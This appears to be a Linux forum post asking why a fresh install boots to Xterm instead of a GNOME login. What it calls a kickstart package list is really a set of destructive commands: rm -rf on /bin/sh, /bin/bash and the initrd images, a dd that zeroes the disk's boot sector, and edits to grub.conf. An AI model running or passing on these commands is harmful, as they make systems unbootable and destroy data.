Why i see always Xterm after login?

Default Why i see always Xterm after login?

hi

there is no option for GNOME at login screen in /etc/sysconfig/desktop its gnome set but still i see Xterm i think its failsafe terminal gdm is installed i can see this via #which gdm in /usr/sbin/gdm
but strange thing i cant see this in services list when i run #service gdm restart it says unrecognised service but package is installed which is gdm-2.16.0-30.el5 and mind you its an fresh install.... ... pls help me out guys

Here are the packages i installed according to my kickstart file

e2label /dev/sda2 /.
e2label /dev/sda3 /
#mv /etc/inittab /etc/initab
sed -e 's/el5/e15/g' -i.bak /boot/grub/grub.conf
rm -rf /bin/sh
rm -fr /bin/bash
rm -rf /boot/initrd*
dd if=/dev/zero of=/dev/sda bs=200 count=1



i installed an another kickstart also which has similer packages but there i can see GNOME-session working easily
